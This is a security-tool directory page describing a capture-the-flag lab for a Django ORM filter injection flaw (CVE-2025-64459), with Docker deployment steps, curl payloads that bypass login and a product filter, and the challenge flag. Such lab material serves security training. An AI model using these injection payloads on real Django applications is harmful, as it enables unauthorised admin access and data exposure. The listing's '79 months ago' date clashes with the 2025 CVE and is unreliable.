Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-64459 — CTF challenge demonstrating Django ORM filter injection (CVE-2025-64459) with auth bypass and product filter bypass exploits, including deployment and flag retrieval. | Kitploit
Tools/GitHubGitHub/z3yr0xx/cve-2025-64459
Vulnerability AnalysisWeb Application ExploitationWeb SecurityCTFLearning & EducationLabs & Practice
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

CTF challenge demonstrating Django ORM filter injection (CVE-2025-64459) with auth bypass and product filter bypass exploits, including deployment and flag retrieval.

View Repository
79 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CTF Challenge: Django ORM Injection (CVE-2025-64459)

Category: Web Security
Difficulty: Medium
Vulnerability: CVE-2025-64459 - Django ORM Filter Injection

📝 Description

We built a secure merch shop with admin panel. Can you bypass the authentication and find the private admin note

URL: http://YOUR_SERVER:6008

🚀 Deployment

cd web_django_cve
docker-compose up --build -d

🎯 Exploits (CVE-2025-64459)

Auth Bypass (/login/)

# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

Product Filter Bypass (/)

# Negate is_public filter
curl "http://HOST:8054/?_negated=True"

# Direct access
curl "http://HOST:8054/?is_public=False"

🏁 Flag

lol-you-here_then-you_exploited_me

Download Tool